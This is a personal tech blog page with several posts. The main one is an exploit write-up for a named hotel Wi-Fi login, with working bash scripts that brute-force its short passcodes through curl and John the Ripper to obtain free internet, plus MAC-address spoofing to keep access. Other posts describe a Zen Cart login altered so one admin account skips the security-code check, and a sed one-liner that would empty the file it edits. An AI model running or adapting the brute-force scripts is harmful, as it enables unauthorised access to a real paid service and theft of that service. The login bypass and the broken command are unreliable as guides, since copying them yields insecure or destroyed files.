apt-get install php5 mysql-server php5-mysql apache2
-
Subscribe
Subscribed
Already have a WordPress.com account? Log in now.
apt-get install php5 mysql-server php5-mysql apache2
# Exploit Title: Guestek / Oneview – Extended Stay 5 dollar crack
# Date: 2012-01-04 ( The end is near!! )
# Author: Skraps, Jackie Craig Sparks(jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: https://login.globalsuite.net
# Version: 2 (tested), same idea works on older systems
# Spamvertise: https://www.facebook.com/Boycottcpanel – Join the boycott
This is a popular login system for Extended Stay of America hotels. Basically every since I was 21 they always started their passcodes with the letter D. They are also 4 characters in length and always in uppercase letters. So That leaves us with a little less than 45000 possibilities that our passcode could be. The guestek system also uses does not protect against brute force attacks. So with the fail script below in a matter of 3-4 hours or less we can slam it 10-15 passcodes a second. With out degrading system performance. Then within the 4 hours at some point we have free internet.
They also use mac address whitelisting so the code changed on Jan 1st but I’ve still been able to connect since then doing my testing by changing my mac address.
The solution use stronger passcodes, also add bruteforce protection so after 20 failed attempts(I have made over 100k while testing) block the mac address, set a cookie also with a code so the web app knows not to allow access to the login prompt. Make mac address whitelist clear after 24 hours and use a cookie on the clients box to verify user before adding them back to the mac white list.
——PoC——
Script needs curl( curl.haxx.se ) and john the ripper ( http://www.openwall.com/john ) .
usage – ./oneveiw.sh – then just wait.
oneview.sh-
#!/bin/bash
curl -s –location https://login.globalsuite.net/v2/Login
count=0
pcount=0
pmax=30
[ ! -e ./oneviewdebug ] && mkdir debug
[ -e ./oneviewpass ] && rm oneviewpass
for a in `john –incremental:alnum –stdout:3 | tr ‘[a-z]’ ‘[A-Z]’`;do
if [ ${#a} -gt 2 ]; then
./curloneview.sh D${a} &
count=$(($count + 1))
pcount=`ps aux | grep curl | wc -l`
if (( $pcount > $pmax )); then
sleep 2
fi
if [ -e ./oneviewpass ];then
echo “Password found”;
cat ./oneviewpass
rm -fr ./oneviewdebug
exit
fi
fi
done
[ -e ./debug ] && rm -fr ./oneviewdebug
–EOF–
curloneview.sh-
#!/bin/bash
pass=”$1″;
echo -ne “Trying ${pass} \r”
function curlit(){
curl -s -d “passcode=${pass}&firstname=joe&lastname=swanson&companyname=help%40juno.com” –output “./oneviewdebug/${pass}output.txt” –referer https://login.globalsuite.net/v2/Login –location https://login.globalsuite.net/v2/globalnet/ProcessPasscode
}
function chkpass(){
chk=`grep “#alert-error#_#AJAX#_# Invalid passcode entered” ./oneviewdebug/${pass}output.txt`
if [ “$chk” != “#alert-error#_#AJAX#_# Invalid passcode entered” ];then
echo “Password is ${pass}”
echo ${pass} > ./oneviewpass
fi
}
while [ ! -e “./oneviewdebug/${pass}output.txt” ]; do
curlit
done
chkpass
I just finished a small job updating a zencart database with products from a whole seller. The client had a script already that was built to manipulate the data directly in the database. I really didn’t want to mess with the database directly and thought it might be better off just using the easy update plugin for zencart.
Well during this process I realized that the products did not match the layout for easy populate. So Then we had to convert the csv file.
Well after converting the script file I tried logging into zen cart and it failed every time even when scraping the security code from the login. So I screwed around with that for a couple of hours just fiddling finger effing my keyboard.
Now I decided to take a look at how easy-populate works, turns out that zen plugins are really easy. The script accepts post data for the upload directly and can run independently from the admin interface.
So I didn’t want to thwart the security setup of zen cart. So I added a extra user with a admin_id of 999.
Then proceeded to mod the login I placed the security code if statement below the username and password checks. Then a custom if statement between the 2. That included the easypopulate.php file then exited right afterwards.
Now when logging in with my custom user with the admin_id of 999 it loaded the easy-populate. So now I was able to use curl to post the login data and the newly convert csv file to easy populate so it can insert and update the products.
It was a task, took 3 days to complete all in all. I’m sure if I was a more skilled developer this would have been done in a day or 2. Not counting all the walks I took to refocus.
I will be posting the code google code shortly after I’m satisfied with it. There are still some debugging features.
Currently it encrypts the config information with aes 256, has a web ui for importing and updating. Yeah, it’s stooopid 😉
I’ve been working on wordpress security here lately. I have been trying to combine the bullet-proof and wp-sentinel plug ins together. I feel wp-sentinel is far superior than wp-bullet proof in the because it actually bans intruders instead of rewriting their url to a safe url. Then alot of the canned rules wp-sentinel already takes care of. So including having – Indexes in the htaccess why not block people who are intentionally trying to peek into the directories also.
So I threw together these rules to use with wp-sentinel and also borrowed some from bullet-proof
# DO NOT SHOW DIRECTORY LISTING
# If you are getting 500 Errors when activating BPS then comment out Options -Indexes
# by adding a # sign in front of it. If there is a typo anywhere in this file you will also see 500 errors.
Options -Indexes
#Rewrite anyone who is trying to snoop into the directories to be logged by wp-sentinel
RewriteBase /
RewriteCond %{REQUEST_FILE} !-f
RewriteRule ^([^/.]+)/?$ /?s=../../dirblock1 [R=301,L]
RewriteRule ^([^/.]+)/([^/.]+)/?$ /?s=../../dirblock2 [R=301,L]
RewriteRule ^([^/.]+)/([^/.]+)/([^/.]+)/?$ /?s=../../dirblock3 [R=301,L]
RewriteRule ^([^/.]+)/([^/.]+)/([^/.]+)/([^/.]+)/?$ /?s=../../dirblock4 [R=301,L]
RewriteRule ^([^/.]+)/([^/.]+)/([^/.]+)/([^/.]+)/([^/.]+)/?$ /?s=../../dirblock5 [R=301,L]
# BLOCK HOTLINKING TO IMAGES
# To Test that your Hotlinking protection is working visit http://altlab.com/htaccess_tutorial.html
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?raskitchen\.com [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule .*\.(jpeg|jpg|gif|bmp|png)$ – [F]
missing user and group names in chroot – need these files
is user in /etc/passwd and /etc/group?
Are these files inside the jail?
/etc/nsswitch.conf
/lib/i386-linux-gnu/libnss_files.so.2
/lib/i386-linux-gnu/libnss_nis.so.2
/lib/i386-linux-gnu/libnsl.so.1
/lib/i386-linux-gnu/libnss_compat.so.2
/lib/i386-linux-gnu/libattr.so.1
/lib/i386-linux-gnu/libpthread.so.0
Ok I’ve been playing with chrooting and jails for the past 2 days. I used jailkit ( olivier.sessink.nl/jailkit/ ) . I used this to create a extended jail for users. Then also combined a idea found on this blog http://0x80.org/blog/?p=13 and http://antitese.org/sshjail/downloads/openssh-5.2p1-sshjail.patch . I managed to get it to work and create a small shell environment for users. Then I started playing and trying to chroot the sshd deamon inside the Jail also. After getting the nis and other libraries moved(hardlinked) into the jail. I ran into a problem with the privsep user setup. It’s trying to write to /var/empty and doesn’t have sufficient privileges after running the daemon through chrootuid command. So it cannot write to the directory and then it cannot bind to a port. because it swaps to the unprivileged user before the nitty gritty work is done. I’m beginning to think this isn’t going to happen and I would need to leave sshd outside the jail
The idea was to keep a ssh daemon on the main system running on a high privileged port ie:2222 or something then have the chroot ssh client running on 22 that would take advantage of rssh and restrict the users directly to there home directories to create a “simple” shared hosting environment that takes advantage of extra security features.
Layout of what I think would be a good structure for a shared host.
Server Base (fail2ban, sshd, tripwire, fwsnort, fwknop)
|
|\_______ Mysql w/ bigtables and ssl enabled(local socket does not work but tcp would)
| Jail 1
|
|\_______sshd+rssh, httpd,php,sftp
| Jail 2
|
|\_______Mysql(administration database)user account info and mail(vpopmail)
| Jail 3
|
|\_______httpd,php(adminitration panel)
| Jail 4
|
|\_______ Qmail + vpopmail binaries
| Jail 5
|
\_______ Tinydns ( only 1 security issue ever found )
Jail 6
Ok in the past 6 months google has just started to offer SSL services to their users for there search engine. I just reinstalled my laptop and was browsing and used the search bar and it brought me to a regular http google search page. Hmm… it’s time to change this.
Well first we need to locate the firefox install directory then after that look inside the searchplugins/en-US directory. Open up the search provider. In my case it was google.xml . So the full path is: “/usr/lib/firefox-7.0.1/searchplugins/en-US/google.xml” Change all the references of http to https
A easy way to do this would be like so.
sudo cat /usr/lib/firefox-7.0.1/searchplugins/en-US/google.xml | sed ‘s/http/https/g’ > /usr/lib/firefox-7.0.1/searchplugins/en-US/google.xml
Restart firefox and go https!
I was playing with some code in order to test psad(port scan auto detector) and some other stuff. I didn’t have extra servers at my disposal so I decided to use the tor network to perform my testing with. This is done in bash for linux and needs to be in the /etc/tor directory . Better yet read the code before you run it to make sure it doesn’t mess any thing up on your system. Alot of people have their systems configured differently. Tor build project page
Heres a mod of phpBB that stores the user password in the database and encrypts it with AES. phpBB AES
I’ve been working on implementing AES encryption into the wordpress core. I have a working example hosted on google code at the moment. It’s missing some features and theres more to be added, but here is a link to the code WordPress AES edition . In no way am I trying to deface the security of wordpress. I just would like to see them add these functions into the code base.
The ramblings of a mad penguin 